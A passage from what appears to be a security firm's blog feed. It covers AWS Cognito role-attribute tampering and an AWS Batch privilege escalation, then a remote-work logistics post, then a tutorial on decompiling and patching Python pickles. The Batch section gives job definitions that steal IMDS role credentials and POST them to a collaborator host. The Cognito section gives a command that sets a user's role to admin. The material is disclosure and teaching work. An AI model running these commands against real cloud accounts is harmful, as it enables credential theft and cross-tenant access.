            "Value": "user"
        },
        {
            "Name": "email",
            "Value": "[email protected]"
        }
    ]
}

Then, because of the default READ/WRITE permissions on the user attributes, the attacker is able to tamper with the custom:Role attribute and set it to admin:

aws --region us-east-1 cognito-idp update-user-attributes --user-attributes "Name=custom:Role,Value=admin" --access-token <USER_ACCESS_TOKEN>

After that, by refreshing the authenticated tab, the user is now recognized as an admin.

That happens because the vulnerable platform trusts the custom:Role attribute when evaluating the authorization level of the user.
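For completeness, the same tampering can be scripted with boto3; a minimal sketch, where the token placeholder stands for the value of the aws-cognito-app-access-token cookie:

import boto3

# Access token extracted from the aws-cognito-app-access-token cookie
token = "<USER_ACCESS_TOKEN>"

client = boto3.client("cognito-idp", region_name="us-east-1")

# Overwrite the custom:Role attribute, mirroring the CLI command above
client.update_user_attributes(
    UserAttributes=[{"Name": "custom:Role", "Value": "admin"}],
    AccessToken=token,
)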

Tidbit No. 3 - Messing around with AWS Batch For Privilege Escalations

Q: What is AWS Batch?

  • A set of batch management capabilities that enable developers, scientists, and engineers to easily and efficiently run hundreds of thousands of batch computing jobs on AWS.

  • AWS Batch dynamically provisions the optimal quantity and type of compute resources (e.g. CPU or memory optimized compute resources) based on the volume and specific resource requirements of the batch jobs submitted.

  • With AWS Batch, there is no need to install and manage batch computing software or server clusters, allowing you to instead focus on analyzing results and solving problems.

  • AWS Batch plans, schedules, and executes your batch computing workloads using Amazon EC2 (available with Spot Instances) and AWS compute resources with AWS Fargate or Fargate Spot.

Summarizing the previous points, AWS Batch is a fully managed, auto-scaling scheduler for tasks.

Its main components are:

  • Jobs. The unit of work, they can be shell scripts, executables, or a container image submitted to AWS Batch.

  • Job definitions. They are blueprints for the tasks. It is possible to grant them IAM roles to access AWS resources, set their memory and CPU requirements, and even control container properties like environment variables or mount points for persistent storage.

  • Job Queues. Submitted jobs are stacked in queues until they are scheduled onto a compute environment. Job queues can be associated with multiple compute environments and configured with different priority values.

  • Compute environments. Sets of managed or unmanaged compute resources that are usable to run jobs. With managed compute environments, you can choose the desired compute type (Fargate, EC2 and EKS) and deeply configure its resources. AWS Batch launches, manages, and terminates compute types as needed. You can also manage your own compute environments, but you’re responsible for setting up and scaling the instances in an Amazon ECS cluster that AWS Batch creates for you.

The scheme below (taken from the AWS documentation) shows the workflow for the service.

After a first look at AWS Batch basics, we can introduce the core differences in the managed compute environment types.

Orchestration Types In Managed Compute Environments

Fargate

AWS Batch jobs can run on AWS Fargate resources. AWS Fargate uses Amazon ECS to run containers and orchestrates their lifecycle.

This configuration fits cases where it is not needed to have control over the host machine running the container task. All the logic is embedded in the task and there is no need to add context from the host machine.

EC2

AWS Batch jobs can run on Amazon EC2 instances. It allows particular instance configurations like:

  • Settings for vCPUs, memory and/or GPU
  • Custom Amazon Machine Image (AMI) with launch templates
  • Custom environment parameters

This configuration fits scenarios where it is necessary to customize and control the containers' host environment. As an example, you may need to mount an Elastic File System (EFS) and share some folders with the running jobs.

EKS

AWS Batch doesn’t create, administer, or perform lifecycle operations of the EKS clusters. AWS Batch orchestration scales up and down nodes managed by AWS Batch and runs pods on those nodes.

The considerations are similar to the ECS case.

Running Tasks With Two Metadata Services & Two Roles - The Unwanted Role Exposure Case

While testing a multi-tenant platform, we managed to leverage AWS Batch to compromise the cloud environment and perform privilege escalation.

Each tenant used AWS Batch to execute computational work on a given input to be processed (tenant data).

The task jobs of all tenants were initialized and executed using the EC2 orchestration type; hence, all batch containers were running on the same task-runner EC2 instances.

The scheme below describes the observed scenario at a high-level.

The tenant data (input) was mounted on the EC2 spot instance prior to execution with Elastic File System (EFS). As can be seen in the design scheme, each tenant's input data was shared with its batch job containers via dedicated shared folders.

This might seem like a secure and well-isolated environment, but it wasn't.

In order to illustrate the final exploitation, a few IAM concepts about the vulnerable context must be explained:

  • Within the described design, the compute environment EC2 spot instances needed a specific role with highly privileged permissions to manage multiple services, including EFS to mount customers’ data

  • The task containers (batch jobs) had an execution role with the batch:RegisterJobDefinition and batch:SubmitJob permissions.

The Testing Phase

During testing, we obviously tried to execute code in the jobs to get access to some internal AWS credentials. Since the Instance Metadata Service (IMDSv2) was network-restricted in the running containers, it was not possible to get an easy win by reaching 169.254.169.254 (the IMDS IP).

Nevertheless, containers running in ECS and EKS have the Container Metadata Service (CMDS) running and reachable at 169.254.170.2 (did you know?). It is literally the doppelganger of the IMDS service, but for containers and pods in AWS.

Thanks to it, we were able to gather information about the running task. By looking at the AWS documentation, you can learn more about the many environment variables exposed to the running container. Among them is AWS_CONTAINER_CREDENTIALS_RELATIVE_URI.

The CMDS protects users against SSRF attacks by exposing the credentials endpoint at a pseudo-random path, which is saved in that environment variable. Basic SSRF payloads cannot guess the pseudo-random part of the path and therefore cannot retrieve credentials.

The screenshot below shows an interaction with the CMDS to get the credentials from a running container (our execution context).
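In essence, the interaction boils down to the following (a sketch of what we ran inside the job container; values redacted):

$ curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
{"RoleArn":"arn:aws:iam::<redacted>:role/ecs-role","AccessKeyId":"<redacted>","SecretAccessKey":"<redacted>","Token":"<redacted>","Expiration":"<redacted>"}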

At this point, we had the credentials for the ecs-role owned by the running jobs.

Among the ECS-related execution permissions, it had RegisterJobDefinition, SubmitJob and DescribeJobQueues for the AWS Batch service.

Since the basic threat model assumed that users had command execution on the running containers, a certain level of control over the job definitions was not an issue.

Hence, having the RegisterJobDefinition and SubmitJob permissions exposed in the user-controlled context was not considered a vulnerability in the first place.

So, the next question was pretty obvious:

The Turning Point

After many hours of dorking and code review, we managed to discover two additional details:

  • In the AWS Batch with EC2 compute environment, the jobs’ containers run with host network configuration. This means that Batch job containers use the host EC2 Spot instance’s networking directly
  • The platform was restricting the IMDS connectivity on job containers when the worker was starting the tasks

Due to these conditions, a batch job could call the IMDSv2 service on behalf of the host EC2 Spot instance if it started without the restrictions applied by the worker, potentially leading to a privilege escalation:

  1. An attacker with the leaked batch job credentials could use RegisterJobDefinition and SubmitJob to define and execute a malicious AWS Batch job.

  2. The malicious job is able to communicate with the IMDS service on behalf of the host EC2 Spot instance, since the network restrictions to the IMDS were not applied.

  3. In this way, it was possible to obtain credentials for the IAM Role owned by the EC2 Spot instances.

As mentioned earlier, the compute environment EC2 spot instances used a role with highly privileged permissions to manage multiple services, including EFS access to mount customers' data.

PrivEsc Exploitation

The exploitation phase required two job definitions to interact with the IMDSv2: one to get the instance IAM role name, and one to retrieve the IAM security credentials for the leaked role name.

Job Definition 1 - Getting the host EC2 Spot instance role name

$ aws batch register-job-definition --job-definition-name poc-get-rolename --type container --container-properties '{ "image": "curlimages/curl", "vcpus": 1, "memory": 20, "command": [ "sh","-c","TOKEN=`curl -X PUT http://169.254.169.254/latest/api/token -H X-aws-ec2-metadata-token-ttl-seconds:21600`; curl -s -H X-aws-ec2-metadata-token:$TOKEN http://169.254.169.254/latest/meta-data/iam/security-credentials/ > /tmp/out ; curl -d @/tmp/out -X POST http://BURP_COLLABORATOR/exfil; sleep 4m"]}'

After registering the job definition, submit a new job using the newly created job definition:

aws batch submit-job --job-name attacker-jb-getrolename --job-queue LowPriorityEc2 --job-definition poc-get-rolename --scheduling-priority-override 999 --share-identifier asd

Note: the job queue name was retrievable with aws batch describe-job-queues

The attacker collaborator server received something like:

POST /exfil HTTP/1.1
Host: fo78ichlaqnfn01sju2ck6ixwo2fqaez.oastify.com
User-Agent: curl/8.0.1-DEV
Accept: */*
Content-Length: 44
Content-Type: application/x-www-form-urlencoded

iam-instance-role-20230322003148155300000001

Job Definition 2 - Getting the credentials for the host EC2 Spot instance role

$ aws batch register-job-definition --job-definition-name poc-get-aimcreds --type container --container-properties '{ "image": "curlimages/curl", "vcpus": 1, "memory": 20, "command": [ "sh","-c","TOKEN=`curl -X PUT http://169.254.169.254/latest/api/token -H X-aws-ec2-metadata-token-ttl-seconds:21600`; curl -s -H X-aws-ec2-metadata-token:$TOKEN http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME > /tmp/out ; curl -d @/tmp/out -X POST http://BURP_COLLABORATOR/exfil; sleep 4m"]}'

As with the previous definition, after submitting the job, the collaborator received the output.

POST /exfil HTTP/1.1
Host: 4otxi1haafn4np1hjj21kvimwd24qyen.oastify.com
User-Agent: curl/8.0.1-DEV
Accept: */*
Content-Length: 1430
Content-Type: application/x-www-form-urlencoded

{"RoleArn":"arn:aws:iam::1235122316123:role/ecs-role","AccessKeyId":"<redacted>","SecretAccessKey":"<redacted>","Token":"<redacted>","Expiration":"2023-03-22T06:54:42Z"}

This time it contained the AWS credentials for the host EC2 Spot instance role.

Privilege escalation achieved! The obtained role allowed us to access other tenants’ data and do much more.

Default Host Network Mode In AWS Batch With EC2 Orchestration

In AWS Batch with EC2 compute environments, the containers run with the host network mode by default.

With such a configuration, the containers (batch jobs) have access to both the EC2 IMDS and the CMDS.

The issue lies in the fact that the container job is able to communicate with the IMDSv2 service on behalf of the EC2 Spot instance, because they share the same network interface.

In conclusion, it is very important to know about such behavior and avoid the possibility of introducing privilege escalation patterns while designing cloud environments.

For cloud security auditors

When the platform uses AWS Batch compute environments with EC2 orchestration, consider the following points and questions:

  • Always consider the security of the AWS Batch jobs and the impact of their compromise. A threat actor could escalate vertically or horizontally and gain broader access to the cloud infrastructure.
    • Which aspects of the job execution are controllable by the external user?
    • Is command execution inside the jobs intended by the platform?
      • If yes, investigate the permissions available through the CMDS
      • If no, attempt to achieve command execution within the jobs’ context
    • Is the IMDS restricted from the job execution context?
  • Which types of Compute Environments are used in the platform?
    • Are there any Compute Environments configured with EC2 orchestration?
      • If yes, which role is assigned to EC2 Spot Instances?

Note: The dangerous behavior described in this blogpost also applies to configurations involving Elastic Container Service (ECS) tasks with EC2 launch type.

For developers

Developers should be aware of the fact that AWS Batch with EC2 compute environments will run containers with host network configuration. Consequently, the executed containers (batch jobs) have access to both the CMDS for the task role and the IMDS for the host EC2 Spot Instance role.

In order to prevent privilege escalation patterns, Job runs must match the following configurations:

  • Having the IMDS restricted at network level in running jobs. Read the documentation here

  • Restricting the batch job execution role and job role IAM permissions. In particular, avoid assigning RegisterJobDefinition and SubmitJob permissions in job-related or accessible policies to prevent uncontrolled job execution by attackers landing on the job context (see the policy sketch after this list)
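As an illustration of the second point, an explicit deny along these lines (a sketch to be adapted to your environment) prevents a compromised job from registering and submitting new jobs:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyBatchJobInjection",
      "Effect": "Deny",
      "Action": [
        "batch:RegisterJobDefinition",
        "batch:SubmitJob"
      ],
      "Resource": "*"
    }
  ]
}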

If both configurations are not applicable in your design, consider changing the orchestration type.

Note: Once again, the dangerous behavior described in this blogpost also applies to configurations involving Elastic Container Service (ECS) tasks with the EC2 launch type.

Hands-On IaC Lab

As promised in the series’ introduction, we developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/

Stay tuned for the next episode!

Logistics for a Remote Company

Logistics and shipping devices across the world can be a challenging task, especially when dealing with customs regulations. For the past few years, I have had the opportunity to learn about these complex processes and how to manage them efficiently. As a Practice Manager at Doyensec, I was responsible for building processes from scratch and ensuring that our logistics operations ran smoothly.

Since 2018, I have had to navigate the intricate world of logistics and shipping, dealing with everything from international regulations to customs clearance. Along the way, I have learned valuable lessons and picked up essential skills that have helped me manage complex logistics operations with ease.

Logistics for a Remote Company

In this post, I will share my experiences and insights on managing shipping devices across the world, dealing with customs, and building efficient logistics processes. Whether you’re new to logistics or looking to improve your existing operations, my learnings and experiences will prove useful.

Employee Onboarding

At Doyensec, when we hire a new employee, our HR specialist takes care of all the necessary paperwork, while I focus on logistics. This includes creating a welcome package and shipping all the necessary devices to the employee’s location. While onboarding employees from the United States and European Union is relatively easy, dealing with customs regulations in other countries can be quite challenging.

For instance, shipping devices from/to countries such as the UK (post Brexit), Turkey, or Argentina can be quite complicated. We need to be aware of the customs regulations in these countries to ensure that our devices are not bounced back or charged exorbitant customs fees.

Navigating customs regulations in different countries can be a daunting task. Still, we’ve learned that conducting thorough research beforehand and ensuring that our devices comply with the necessary regulations can help avoid any unnecessary delays or fees. At Doyensec, we believe that providing our employees with the necessary tools and equipment to perform their job is essential, and we strive to make this process as seamless as possible, regardless of where the employee is located.

Testing Hardware Management

At Doyensec, dealing with testing hardware is a crucial aspect of our operations. We use a variety of testing equipment for our work. This means that we often have to navigate customs regulations, including the payment of customs fees, to ensure that our laptops, YubiKeys and mobile devices arrive on time.

To avoid delays in conducting security audits, we often choose to pay additional fees, including VAT and customs charges, to ensure that we receive hardware promptly. We understand that time is of the essence, and we prioritize meeting our clients’ needs, even if it means spending more money to ensure items required for testing are not held up at customs.

In addition to paying customs fees, we also make sure to keep all necessary documentation for each piece of hardware that we manage. This documentation helps us to speed up further processes and ensures that we can quickly identify and locate each and every piece of hardware when needed.

The hardware we deal with most frequently is laptops, though we also occasionally receive YubiKeys. Fortunately, YubiKeys generally do not cause any problems at customs (low market value), and we can usually receive them without any significant issues.

Over time, we’ve learned that different shipping companies have different approaches to customs regulations. To ensure that we can deliver quality service to our clients, we prefer to use companies that we know will treat us fairly and deliver hardware on time. We have almost always had a positive experience with DHL as our preferred shipping provider. DHL’s automated custom processes and documentation have been particularly helpful in ensuring smooth and efficient shipping of Doyensec’s hardware and documents across the world. DHL’s reliability and efficiency have been critical in allowing Doyensec to focus on its core business, which is finding bugs for our fantastic clients.

We have a preference for avoiding local post office services when it comes to shipping our hardware or documents. While local post office services may be slightly cheaper, they often come with more problems. Packages may get stuck somewhere during the delivery process, and it can be difficult to follow up with customer service to resolve the issue. This can lead to delayed deliveries, frustrated customers, and ultimately, a negative impact on the company’s reputation. Therefore, Doyensec opts for more reliable shipping options, even if they come with a slightly higher price tag.

2022 Holiday Gifts from Japan

At Doyensec, we believe in showing appreciation for our employees and their hard work. That's why we decided to import some gifts from Japan to distribute among our team members. However, what we did not anticipate was the range of customs fees that we would encounter while shipping these gifts to different countries.

We shipped these gifts to 7 different countries, all through the same shipping company. However, we found that customs officers had different approaches, even within the same country. This resulted in customs fees ranging from 0 to 45 euros per package.

The interesting part was that every package had the same invoice from the Japanese manufacturer attached, but the fees still differed significantly. It was challenging to understand why this was the case, and we still don’t have a clear answer.

Overall, our experience with importing gifts from Japan highlighted the importance of being prepared for unexpected customs fees and the unpredictability of customs regulations.

Conclusion

Managing devices and shipping packages to team members at a globally distributed company, even with a small team, can be quite challenging. Ensuring that packages are delivered promptly and to the correct location can be very difficult, especially with tight project deadlines.

Although it would be easier to manage devices if everyone worked from the same office, at Doyensec, we value remote work and the flexibility that it provides. That’s why we have invested in developing processes and protocols to ensure that our devices are managed efficiently and securely, despite the remote working environment.

While some may argue that these challenges are reason enough to abandon remote work and return to the office, we believe that the benefits of remote work far outweigh any challenges we may face. At Doyensec, remote work allows us to hire talented individuals from all over the EU, as well as the US and Canada, offering a diverse and inclusive work environment. Remote work also allows for greater flexibility and work-life balance, which can result in happier and more productive employees.

In conclusion, while managing devices in a remote work environment can be challenging, we believe that the benefits of remote work make it worthwhile. At Doyensec, we have developed strategies to manage devices efficiently, and we continue to support remote work and its many benefits.

Reversing Pickles with r2pickledec

R2pickledec is the first pickle decompiler to support all instructions up to protocol 5 (the current version). In this post, we will go over what Python pickles are, how they work and how to reverse them with Radare2 and r2pickledec. An upcoming blog post will go even deeper into pickles and share some advanced obfuscation techniques.

What are pickles?

Pickles are the built-in serialization algorithm in Python. They can turn any Python object into a byte stream so it may be stored on disk or sent over a network. Pickles are notoriously dangerous. You should never unpickle data from an untrusted source. Doing so will likely result in remote code execution. Please refer to the documentation for more details.

Pickle Basics

Pickles are implemented as a very simple assembly language. There are only 68 instructions and they mostly operate on a stack. The instruction names are pretty easy to understand. For example, the instruction empty_dict will push an empty dictionary onto the stack.

The stack only allows access to the top item, or items in some cases. If you want to grab something else, you must use the memo. The memo is implemented as a dictionary with positive integer indexes. You will often see memoize instructions. Naively, the memoize instruction will copy the item at the top of the stack into the next index in the memo. Then, if that item is needed later, a binget n can be used to get the object at index n.

To learn more about pickles, I recommend playing with some pickles. Enable descriptions in Radare2 with e asm.describe = true to get short descriptions of each instruction. Decompile simple pickles that you build yourself, and see if you can understand the instructions.
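For example, Python's built-in pickletools module gives you that feedback loop in a couple of lines (a minimal sketch):

import pickle
import pickletools

# Serialize a small object, then disassemble the resulting instruction stream
payload = pickle.dumps({"a": 1}, protocol=5)
pickletools.dis(payload)

The output lists one instruction per line (PROTO, FRAME, EMPTY_DICT, MEMOIZE, and so on), which maps directly onto the disassembly r2 shows.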

Installing Radare2 and r2pickledec

For reversing pickles, our tool of choice is Radare2 (r2 for short). Package managers tend to ship really old r2 versions. In this case it's probably fine, since I added the pickle arch to r2 a long time ago, but if you run into any bugs, I suggest installing from source.

In this blog post, we will primarily be using our R2pickledec decompiler plugin. I purposely wrote this plugin to rely only on r2 libraries, so if r2 works on your system, r2pickledec should work too. You should be able to install it with r2pm.

$ r2pm -U             # update package db
$ r2pm -ci pickledec  # clean install

You can verify everything worked with the following command. You should see the r2pickledec help menu.

$ r2 -a pickle -qqc 'pdP?' -
Usage: pdP[j]  Decompile python pickle
| pdP   Decompile python pickle until STOP, eof or bad opcode
| pdPj  JSON output
| pdPf  Decompile and set pick.* flags from decompiled var names

Reversing a Real Pickle with Radare2 and r2pickledec

Let’s reverse a real pickle. One never reverses without some context, so let’s imagine you just broke into a webserver. The webserver is intended to allow employees of the company to perform privileged actions on client accounts. While poking around, you find a pickle file that is used by the server to restore state. What interesting things might we find in the pickle?

The pickle appears below, base64 encoded. Feel free to grab it and play along at home.

$ base64 -i /tmp/blog2.pickle -b 64
gASVDQYAAAAAAACMCF9fbWFpbl9flIwDQXBplJOUKYGUfZQojAdzZXNzaW9ulIwR
cmVxdWVzdHMuc2Vzc2lvbnOUjAdTZXNzaW9ulJOUKYGUfZQojAdoZWFkZXJzlIwT
cmVxdWVzdHMuc3RydWN0dXJlc5SME0Nhc2VJbnNlbnNpdGl2ZURpY3SUk5QpgZR9
lIwGX3N0b3JllIwLY29sbGVjdGlvbnOUjAtPcmRlcmVkRGljdJSTlClSlCiMCnVz
ZXItYWdlbnSUjApVc2VyLUFnZW50lIwWcHl0aG9uLXJlcXVlc3RzLzIuMjguMpSG
lIwPYWNjZXB0LWVuY29kaW5nlIwPQWNjZXB0LUVuY29kaW5nlIwNZ3ppcCwgZGVm
bGF0ZZSGlIwGYWNjZXB0lIwGQWNjZXB0lIwDKi8qlIaUjApjb25uZWN0aW9ulIwK
Q29ubmVjdGlvbpSMCmtlZXAtYWxpdmWUhpR1c2KMB2Nvb2tpZXOUjBByZXF1ZXN0
cy5jb29raWVzlIwRUmVxdWVzdHNDb29raWVKYXKUk5QpgZR9lCiMB19wb2xpY3mU
jA5odHRwLmNvb2tpZWphcpSME0RlZmF1bHRDb29raWVQb2xpY3mUk5QpgZR9lCiM
CG5ldHNjYXBllIiMB3JmYzI5NjWUiYwTcmZjMjEwOV9hc19uZXRzY2FwZZROjAxo
aWRlX2Nvb2tpZTKUiYwNc3RyaWN0X2RvbWFpbpSJjBtzdHJpY3RfcmZjMjk2NV91
bnZlcmlmaWFibGWUiIwWc3RyaWN0X25zX3VudmVyaWZpYWJsZZSJjBBzdHJpY3Rf
bnNfZG9tYWlulEsAjBxzdHJpY3RfbnNfc2V0X2luaXRpYWxfZG9sbGFylImMEnN0
cmljdF9uc19zZXRfcGF0aJSJjBBzZWN1cmVfcHJvdG9jb2xzlIwFaHR0cHOUjAN3
c3OUhpSMEF9ibG9ja2VkX2RvbWFpbnOUKYwQX2FsbG93ZWRfZG9tYWluc5ROdWKM
CF9jb29raWVzlH2UdWKMBGF1dGiUjAVhZG1pbpSMD1BpY2tsZXMgYXJlIGZ1bpSG
lIwHcHJveGllc5R9lIwFaG9va3OUfZSMCHJlc3BvbnNllF2Uc4wGcGFyYW1zlH2U
jAZ2ZXJpZnmUiIwEY2VydJROjAhhZGFwdGVyc5RoFClSlCiMCGh0dHBzOi8vlIwR
cmVxdWVzdHMuYWRhcHRlcnOUjAtIVFRQQWRhcHRlcpSTlCmBlH2UKIwLbWF4X3Jl
dHJpZXOUjBJ1cmxsaWIzLnV0aWwucmV0cnmUjAVSZXRyeZSTlCmBlH2UKIwFdG90
YWyUSwCMB2Nvbm5lY3SUTowEcmVhZJSJjAZzdGF0dXOUTowFb3RoZXKUTowIcmVk
aXJlY3SUTowQc3RhdHVzX2ZvcmNlbGlzdJSPlIwPYWxsb3dlZF9tZXRob2RzlCiM
BVRSQUNFlIwGREVMRVRFlIwDUFVUlIwDR0VUlIwESEVBRJSMB09QVElPTlOUkZSM
DmJhY2tvZmZfZmFjdG9ylEsAjBFyYWlzZV9vbl9yZWRpcmVjdJSIjA9yYWlzZV9v
bl9zdGF0dXOUiIwHaGlzdG9yeZQpjBpyZXNwZWN0X3JldHJ5X2FmdGVyX2hlYWRl
cpSIjBpyZW1vdmVfaGVhZGVyc19vbl9yZWRpcmVjdJQojA1hdXRob3JpemF0aW9u
lJGUdWKMBmNvbmZpZ5R9lIwRX3Bvb2xfY29ubmVjdGlvbnOUSwqMDV9wb29sX21h
eHNpemWUSwqMC19wb29sX2Jsb2NrlIl1YowHaHR0cDovL5RoVymBlH2UKGhaaF0p
gZR9lChoYEsAaGFOaGKJaGNOaGROaGVOaGaPlGhoaG9ocEsAaHGIaHKIaHMpaHSI
aHUojA1hdXRob3JpemF0aW9ulJGUdWJoeH2UaHpLCmh7SwpofIl1YnWMBnN0cmVh
bZSJjAl0cnVzdF9lbnaUiIwNbWF4X3JlZGlyZWN0c5RLHnVijAdiYXNldXJslIwU
aHR0cHM6Ly9leGFtcGxlLmNvbS+UdWIu

We decode the pickle and put it in a file; let's call it test.pickle. We then open the file with r2, run x to see some hex, and pd to print disassembly. If you ever want to know what an r2 command does, just run the command with a ? appended to the end to get a help menu (e.g., pd?).

$ r2 -a pickle test.pickle
 -- .-. .- -.. .- .-. . ..---
[0x00000000]> x
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x00000000  8004 95bf 0500 0000 0000 008c 1172 6571  .............req
0x00000010  7565 7374 732e 7365 7373 696f 6e73 948c  uests.sessions..
0x00000020  0753 6573 7369 6f6e 9493 9429 8194 7d94  .Session...)..}.
0x00000030  288c 0768 6561 6465 7273 948c 1372 6571  (..headers...req
0x00000040  7565 7374 732e 7374 7275 6374 7572 6573  uests.structures
0x00000050  948c 1343 6173 6549 6e73 656e 7369 7469  ...CaseInsensiti
0x00000060  7665 4469 6374 9493 9429 8194 7d94 8c06  veDict...)..}...
0x00000070  5f73 746f 7265 948c 0b63 6f6c 6c65 6374  _store...collect
0x00000080  696f 6e73 948c 0b4f 7264 6572 6564 4469  ions...OrderedDi
0x00000090  6374 9493 9429 5294 288c 0a75 7365 722d  ct...)R.(..user-
0x000000a0  6167 656e 7494 8c0a 5573 6572 2d41 6765  agent...User-Age
0x000000b0  6e74 948c 1670 7974 686f 6e2d 7265 7175  nt...python-requ
0x000000c0  6573 7473 2f32 2e32 382e 3294 8694 8c0f  ests/2.28.2.....
0x000000d0  6163 6365 7074 2d65 6e63 6f64 696e 6794  accept-encoding.
0x000000e0  8c0f 4163 6365 7074 2d45 6e63 6f64 696e  ..Accept-Encodin
0x000000f0  6794 8c0d 677a 6970 2c20 6465 666c 6174  g...gzip, deflat
[0x00000000]> pd
            0x00000000      8004           proto 0x4
            0x00000002      95bf05000000.  frame 0x5bf
            0x0000000b      8c1172657175.  short_binunicode "requests.sessions" ; 0xd
            0x0000001e      94             memoize
            0x0000001f      8c0753657373.  short_binunicode "Session"  ; 0x21 ; 2'!'
            0x00000028      94             memoize
            0x00000029      93             stack_global
            0x0000002a      94             memoize
            0x0000002b      29             empty_tuple
            0x0000002c      81             newobj
            0x0000002d      94             memoize
            0x0000002e      7d             empty_dict
            0x0000002f      94             memoize
            0x00000030      28             mark
            0x00000031      8c0768656164.  short_binunicode "headers"  ; 0x33 ; 2'3'
            0x0000003a      94             memoize
            0x0000003b      8c1372657175.  short_binunicode "requests.structures" ; 0x3d ; 2'='
            0x00000050      94             memoize
            0x00000051      8c1343617365.  short_binunicode "CaseInsensitiveDict" ; 0x53 ; 2'S'
            0x00000066      94             memoize
            0x00000067      93             stack_global

From the above assembly, it appears this file is indeed a pickle. We also see requests.sessions and Session as strings. This pickle likely imports requests and uses sessions. Let's decompile it. We will run the command pdPf @0 ~.., which takes some explaining, since it uses a couple of r2's features.

  • pdPf - R2pickledec uses the pdP command (see pdP?). Adding an f causes the decompiler to set r2 flags for every variable name. This will make renaming variables and jumping to interesting locations easier.

  • @0 - This tells r2 to run the command at offset 0 instead of the current seek address. This does not matter now, because our current offset defaults to 0, but I make this a habit in general to prevent mistakes when I am seeking around to patch something.
  • ~.. - This is the r2 version of |less. It uses r2's built-in pager. If you like the real less better, you can just use |less. R2 commands can be piped to any command-line program.

Once we execute the command, we will see a Python-like source representation of the pickle. The code is shown below, snipped for brevity. All comments were added by the decompiler.

## VM stack start, len 1
## VM[0] TOP
str_xb = "__main__"
str_x16 = "Api"
g_Api_x1c = _find_class(str_xb, str_x16)
str_x24 = "session"
str_x2e = "requests.sessions"
str_x42 = "Session"
g_Session_x4c = _find_class(str_x2e, str_x42)
str_x54 = "headers"
str_x5e = "requests.structures"
str_x74 = "CaseInsensitiveDict"
g_CaseInsensitiveDict_x8a = _find_class(str_x5e, str_x74)
str_x91 = "_store"
str_x9a = "collections"
str_xa8 = "OrderedDict"
g_OrderedDict_xb6 = _find_class(str_x9a, str_xa8)
str_xbc = "user-agent"
str_xc9 = "User-Agent"
str_xd6 = "python-requests/2.28.2"
tup_xef = (str_xc9, str_xd6)
str_xf1 = "accept-encoding"
...
str_x5c9 = "stream"
str_x5d3 = "trust_env"
str_x5e0 = "max_redirects"
dict_x51 = {
        str_x54: what_x16c,
        str_x16d: what_x30d,
        str_x30e: tup_x32f,
        str_x331: dict_x33b,
        str_x33d: dict_x345,
        str_x355: dict_x35e,
        str_x360: True,
        str_x36a: None,
        str_x372: what_x5c8,
        str_x5c9: False,
        str_x5d3: True,
        str_x5e0: 30
}
what_x5f3 = g_Session_x4c.__new__(g_Session_x4c, *())
what_x5f3.__setstate__(dict_x51)
str_x5f4 = "baseurl"
str_x5fe = "https://example.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x616 = g_Api_x1c.__new__(g_Api_x1c, *())
what_x616.__setstate__(dict_x21)
return what_x616

It’s usually best to start reversing at the end with the return line. That is what is being returned from the pickle. Hit G to go to the end of the file. You will see the following code.

str_x5f4 = "baseurl"
str_x5fe = "https://example.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x616 = g_Api_x1c.__new__(g_Api_x1c, *())
what_x616.__setstate__(dict_x21)
return what_x616

The what_x616 variable is getting returned. The what part of the variable name indicates that the decompiler does not know what type of object it is, because what_x616 is the result of a g_Api_x1c.__new__ call. On the other hand, g_Api_x1c gets a g_ prefix because the decompiler knows it is a global, since it comes from an import. It even adds the Api part to hint at what the import is. The x1c and x616 suffixes indicate the offsets in the pickle where the objects were created. We will use that later to patch the pickle.

Since we used flags, we can easily rename variables by renaming the corresponding flag. It might be helpful to rename g_Api_x1c to make it easier to search for. Rename the flag with fr pick.g_Api_x1c pick.api. Notice that the flag name will tab-complete. List all flags with the f command. See f? for help.

Now run pdP @0 ~.. again. Instead of g_Api_x1c, you will see api. If we search for its first use, we find the code below.

str_xb = "__main__"
str_x16 = "Api"
api = _find_class(str_xb, str_x16)
str_x24 = "session"
str_x2e = "requests.sessions"
str_x42 = "Session"
g_Session_x4c = _find_class(str_x2e, str_x42)

Naively, _find_class(module, name) is equivalent to _getattribute(sys.modules[module], name)[0]. We can see the module is __main__ and the name is Api. So the api variable is just __main__.Api.

In this snippet of code, we see the requests session being imported. You may have noticed the baseurl field in the previous snippet of code. It looks like this object contains a session for making backend API requests. Can we steal something good from it? Googling for "requests session basic authentication" turns up the auth attribute. Let's look for "auth" in our pickle.

str_x30e = "auth"
str_x315 = "admin"
str_x31d = "Pickles are fun"
tup_x32f = (str_x315, str_x31d)
str_x331 = "proxies"
dict_x33b = {}
...
dict_x51 = {
        str_x54: what_x16c,
        str_x16d: what_x30d,
        str_x30e: tup_x32f,
        str_x331: dict_x33b,
        str_x33d: dict_x345,
        str_x355: dict_x35e,
        str_x360: True,
        str_x36a: None,
        str_x372: what_x5c8,
        str_x5c9: False,
        str_x5d3: True,
        str_x5e0: 30
}

It might be helpful to rename variables for understanding, or run pdP > /tmp/pickle_source.py to get a .py file to open in your favorite text editor. In short though, the above code sets up the dictionary dict_x51 where the auth element is set to the tuple ("admin", "Pickles are fun").

We just stole the admin credentials!

Patching

Now, I don't recommend doing this on a real pentest, but let's take things further. We can patch the pickle to use our own malicious webserver. We first need to find the current URL, so we search for "https" and find the following code.

str_x5f4 = "baseurl"
str_x5fe = "https://example.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x616 = api.__new__(g_Api_x1c, *())

So the baseurl of the API is being set to https://example.com/. To patch this, we seek to where the URL string is created. We can use the x5fe in the variable name to know where the variable was created, or we can just seek to the pick.str_x5fe flag. When seeking to a flag in r2, you can tab-complete the flag name. Notice that the prompt changes its location number after the seek command.

[0x00000000]> s pick.str_x5fe
[0x000005fe]> pd 1
            ;-- pick.str_x5fe:
            0x000005fe      8c1468747470.  short_binunicode "https://example.com/" ; 0x600

Let’s overwrite this URL with https://doyensec.com/. The below Radare2 commands are commented so you can understand what they are doing.

[0x000005fe]> oo+ # reopen file in read/write mode
[0x000005fe]> pd 3 # double check what next instructions should be
            ;-- pick.str_x5fe:
